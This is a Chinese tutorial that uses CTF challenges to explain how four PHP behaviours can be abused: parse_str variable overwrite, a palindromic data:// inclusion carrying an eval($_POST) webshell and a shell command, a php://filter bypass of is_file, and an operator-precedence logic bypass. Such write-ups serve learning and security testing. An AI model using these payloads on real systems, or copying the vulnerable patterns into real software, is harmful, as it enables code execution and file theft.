我的编程空间,编程开发者的网络收藏夹
学习永远不晚

CTF中的PHP特性函数怎么使用

短信预约 -IT技能 免费直播动态提醒
省份

北京

  • 北京
  • 上海
  • 天津
  • 重庆
  • 河北
  • 山东
  • 辽宁
  • 黑龙江
  • 吉林
  • 甘肃
  • 青海
  • 河南
  • 江苏
  • 湖北
  • 湖南
  • 江西
  • 浙江
  • 广东
  • 云南
  • 福建
  • 海南
  • 山西
  • 四川
  • 陕西
  • 贵州
  • 安徽
  • 广西
  • 内蒙
  • 西藏
  • 新疆
  • 宁夏
  • 兵团
手机号立即预约

请填写图片验证码后获取短信验证码

看不清楚,换张图片

免费获取短信验证码

CTF中的PHP特性函数怎么使用

这篇文章主要介绍了CTF中的PHP特性函数怎么使用的相关知识,内容详细易懂,操作简单快捷,具有一定借鉴价值,相信大家阅读完这篇CTF中的PHP特性函数怎么使用文章都会有所收获,下面我们一起来看看吧。

parse_str

CTF中的PHP特性函数怎么使用

parse_str()这个函数会把查询字符串解析到变量中。那么我们如何利用它的特性呢,我们看下面的例子:

<?phphighlight_file(__FILE__);error_reporting(0);include("flag.php");if(isset($_POST['v1'])){    $v1 = $_POST['v1'];    $v3 = $_GET['v3'];       parse_str($v1,$v2);       if($v2['flag']==md5($v3)){           echo $flag;       }} ?>

分析一下代码要求我们什么,看最后要我们数组v2等于md5(v3),而根据上面代码v2则是由该函数经过v1后赋值给的,那我们解题的思路就有了,利用parse_str() 函数的特点将v2[flag]的值覆盖,那么具体要怎样做呢?

先对数字5进行md5加密:

<?php$b=md5('5');echo $b;// e4da3b7fbbce2345d7772b0674a318d5?>

之后再从v1传入我们的值即可完成绕过:

Payload:GET:v3=5POST: v1=flag=e4da3b7fbbce2345d7772b0674a318d5

strrev

CTF中的PHP特性函数怎么使用

这个函数还是很好理解的,就是将字符串进行翻转,曾经遇到过考察这个的题目觉得很有趣分享给大家,我们先看代码:

highlight_file(__FILE__);    $file = $_POST['file'];    if(isset($file)){        if(strrev($file)==$file){            include $file;        }

代码很简单,第一个是高亮代码没有什么用,要我们传入file而且要使回文数等于它本身并且还要考虑如何进行攻击,是不是不太好想,这里使用php里面的data协议,该协议可以进行写入数据,而且?>闭合后可以加任意字符不会受别的影响。于是我们构造代码:

data://text/plain,<?php eval($_POST[1]);?>>?;)]1[TSOP_$(lave php?<,nialp/txet//:atad&1=echo `cat /f1agaaa`;

可以看到思路还是挺巧妙的。

is_file

CTF中的PHP特性函数怎么使用

该函数检测是不是一个常规的文件类型,在CTF中也出过绕过这个函数的题目,下面我们先看看代码:

<?phphighlight_file(__FILE__);error_reporting(0);function filter($file){    if(preg_match('/../|http|https|data|input|rot13|base64|string/i',$file)){        die("hacker!");    }else{        return $file;    }}$file=$_GET['file'];if(! is_file($file)){    highlight_file(filter($file));}else{    echo "hacker!";} ?>

分析一下filter函数过滤了很多关键字符串对我们的输入进行限制,最后还不能让is_file检测出来是文件,那我们要怎样读取flag.php文件呢,看最后有个高亮file的操作,这里就是利用点,我们要让其等于flag文件,于是需要绕过:

这里 根据特性is_file不会识别php伪协议,于是我们构造下面代码:

php://filter/read=convert.quoted-printable-encode/resource=flag.php

这样传入即可绕过检测。

优先级问题

在php里存在以下优先级特性:

&&与||的优先级高于=,而&&优先级高于||

=的优先级高于and与or

这里也可以作为考点来考,我们看下面代码:

<?phpinclude("flag.php");highlight_file(__FILE__);if(isset($_GET['username']) && isset($_GET['password']) && isset($_GET['code'])){    $username = (String)$_GET['username'];    $password = (String)$_GET['password'];    $code = (String)$_GET['code'];    if($code === mt_rand(1,0x36D) && $password === $flag || $username ==="admin"){        if($code == 'admin'){            echo $flag;        }     }}

我们需要传入三个参数,之后进行类型的强制转换,再通过判断语句,最后需要code参数等于admin方可解题,根据优先级原则,所以当第一个判断条件为true时,直接跳过第二个条件然后判断第三个条件,可能有一些绕,只要username=admin为真值,code=admin输出flag,于是构造payload:

?code=admin&password=1&username=admin

关于“CTF中的PHP特性函数怎么使用”这篇文章的内容就介绍到这里,感谢各位的阅读!相信大家对“CTF中的PHP特性函数怎么使用”知识都有一定的了解,大家如果还想学习更多知识,欢迎关注编程网行业资讯频道。

免责声明:

① 本站未注明“稿件来源”的信息均来自网络整理。其文字、图片和音视频稿件的所属权归原作者所有。本站收集整理出于非商业性的教育和科研之目的,并不意味着本站赞同其观点或证实其内容的真实性。仅作为临时的测试数据,供内部测试之用。本站并未授权任何人以任何方式主动获取本站任何信息。

② 本站未注明“稿件来源”的临时测试数据将在测试完成后最终做删除处理。有问题或投稿请发送至: 邮箱/279061341@qq.com QQ/279061341

CTF中的PHP特性函数怎么使用

下载Word文档到电脑,方便收藏和打印~

下载Word文档

猜你喜欢

CTF中的PHP特性函数怎么使用

这篇文章主要介绍了CTF中的PHP特性函数怎么使用的相关知识,内容详细易懂,操作简单快捷,具有一定借鉴价值,相信大家阅读完这篇CTF中的PHP特性函数怎么使用文章都会有所收获,下面我们一起来看看吧。parse_strparse_str()这
2023-07-05

CTF中的PHP特性函数有哪些

本篇内容主要讲解“CTF中的PHP特性函数有哪些”,感兴趣的朋友不妨来看看。本文介绍的方法操作简单快捷,实用性强。下面就让小编来带大家学习“CTF中的PHP特性函数有哪些”吧!intval()官方是怎样定义的:简单来说就是让输入的数字变成整
2023-07-05

CTF中的PHP特性函数实例分析

这篇文章主要介绍“CTF中的PHP特性函数实例分析”的相关知识,小编通过实际案例向大家展示操作过程,操作方法简单快捷,实用性强,希望这篇“CTF中的PHP特性函数实例分析”文章能帮助大家解决问题。MD5强弱碰撞对于MD5加密大家一定很熟悉,
2023-07-05

CTF中的PHP特性函数解析之上篇

这篇文章主要为大家介绍了CTF中的PHP特性函数解析,本文分三篇此篇为上篇,有需要的朋友可以借鉴参考下,希望能够有所帮助,祝大家多多进步,早日升职加薪
2023-02-21

如何使用 PHP 中的特定函数?

specific_function()函数用于处理各种任务。其语法如下:specific_function(parameter1, parameter2, ..., [parametern])。该函数可以接受必需参数、可选参数和命名参数。返
如何使用 PHP 中的特定函数?
2024-04-28

JavaScript中的特殊函数怎么使用

这篇文章主要介绍“JavaScript中的特殊函数怎么使用”,在日常操作中,相信很多人在JavaScript中的特殊函数怎么使用问题上存在疑惑,小编查阅了各式资料,整理出简单好用的操作方法,希望对大家解答”JavaScript中的特殊函数怎
2023-07-02

Vue3 中的 readonly 特性及函数使用详解

readonly是Vue3中提供的一个新特性,用于将一个响应式对象变成只读对象,这篇文章主要介绍了Vue3 中的 readonly 特性详解,需要的朋友可以参考下
2023-05-18

怎么使用PHP中的strstr()函数

这篇文章主要介绍了怎么使用PHP中的strstr()函数,具有一定借鉴价值,感兴趣的朋友可以参考下,希望大家阅读完这篇文章之后大有收获,下面让小编带着大家一起了解一下。php有什么用php是一个嵌套的缩写名称,是英文超级文本预处理语言,它的
2023-06-14

怎么在php中使用asort函数的使用

这篇文章将为大家详细讲解有关怎么在php中使用asort函数的使用,文章内容质量较高,因此小编分享给大家做个参考,希望大家阅读完这篇文章后对相关知识有一定的了解。PHP开发环境搭建工具有哪些一、phpStudy,是一个新手入门最常用的开发环
2023-06-14

php中count函数怎么使用

在PHP中,`count()`函数用于计算数组的长度或者对象中的属性的个数。它的使用方式有以下几种:1. 计算数组长度:```php$arr = [1, 2, 3, 4, 5];$length = count($arr);echo $len
2023-08-24

php中fgets函数怎么使用

这篇文章主要讲解了“php中fgets函数怎么使用”,文中的讲解内容简单清晰,易于学习与理解,下面请大家跟着小编的思路慢慢深入,一起来研究和学习“php中fgets函数怎么使用”吧!在php中,fgets函数用于读取指定文件的一行并返回读取
2023-06-22

php中mysqli_query函数怎么使用

mysqli_query函数用于执行对数据库的查询操作,语法如下:mysqli_query($connection, $query)其中,$connection是一个到MySQL服务器的连接,$query是要执行的SQL查询语句。例如,
php中mysqli_query函数怎么使用
2024-05-23

PHP中substr函数怎么使用

在PHP中,`substr()`函数用于获取字符串的一个子串。它的使用方法如下:```phpsubstr(string $string, int $start, int|null $length = null): string|false`
2023-08-24

php中trim函数怎么使用

在PHP中,trim()函数用于删除字符串的开头和结尾的空格或其他指定字符。它的语法如下:```phptrim(string $str, string $charlist = " \t\n\r\0\x0B")```其中,$str是要处理的字
2023-08-16

PHP中mysqli_num_rows函数怎么使用

在PHP中,mysqli_num_rows函数用于获取结果集中的行数。它的使用方式如下:首先,需要创建一个mysqli对象并连接到数据库。例如:$conn = new mysqli("localhost", "username", "pas
PHP中mysqli_num_rows函数怎么使用
2024-04-09

怎么使用PHP中的断言函数

这篇文章将为大家详细讲解有关怎么使用PHP中的断言函数,小编觉得挺实用的,因此分享给大家做个参考,希望大家阅读完这篇文章后可以有所收获。一起学习PHP中断言函数的使用原来一直以为断言相关的函数是 PHPUnit 这些单元测试组件提供的,在阅
2023-06-15

PHP 函数新特性如何促进 web 应用的性能?

通过利用 php 函数新特性,如 filter_var()、array_chunk() 和 in_array(),可以显著提升 web 应用程序性能:filter_var() 过滤输入,提高数据安全性。array_chunk() 划分大数组
PHP 函数新特性如何促进 web 应用的性能?
2024-05-01

vue中怎么使用es6特性

本篇内容主要讲解“vue中怎么使用es6特性”,感兴趣的朋友不妨来看看。本文介绍的方法操作简单快捷,实用性强。下面就让小编来带大家学习“vue中怎么使用es6特性”吧!特性:1、let和const关键字,用于声明变量;2、“for…of”循
2023-07-05

array_fill函数怎么在php中使用

array_fill函数怎么在php中使用?很多新手对此不是很清楚,为了帮助大家解决这个难题,下面小编将为大家详细讲解,有这方面需求的人可以来学习下,希望你能有所收获。1、说明array_fill()函数用于使用给定索引,从给定索引中填充数
2023-06-06

编程热搜

  • Python 学习之路 - Python
    一、安装Python34Windows在Python官网(https://www.python.org/downloads/)下载安装包并安装。Python的默认安装路径是:C:\Python34配置环境变量:【右键计算机】--》【属性】-
    Python 学习之路 - Python
  • chatgpt的中文全称是什么
    chatgpt的中文全称是生成型预训练变换模型。ChatGPT是什么ChatGPT是美国人工智能研究实验室OpenAI开发的一种全新聊天机器人模型,它能够通过学习和理解人类的语言来进行对话,还能根据聊天的上下文进行互动,并协助人类完成一系列
    chatgpt的中文全称是什么
  • C/C++中extern函数使用详解
  • C/C++可变参数的使用
    可变参数的使用方法远远不止以下几种,不过在C,C++中使用可变参数时要小心,在使用printf()等函数时传入的参数个数一定不能比前面的格式化字符串中的’%’符号个数少,否则会产生访问越界,运气不好的话还会导致程序崩溃
    C/C++可变参数的使用
  • css样式文件该放在哪里
  • php中数组下标必须是连续的吗
  • Python 3 教程
    Python 3 教程 Python 的 3.0 版本,常被称为 Python 3000,或简称 Py3k。相对于 Python 的早期版本,这是一个较大的升级。为了不带入过多的累赘,Python 3.0 在设计的时候没有考虑向下兼容。 Python
    Python 3 教程
  • Python pip包管理
    一、前言    在Python中, 安装第三方模块是通过 setuptools 这个工具完成的。 Python有两个封装了 setuptools的包管理工具: easy_install  和  pip , 目前官方推荐使用 pip。    
    Python pip包管理
  • ubuntu如何重新编译内核
  • 改善Java代码之慎用java动态编译

目录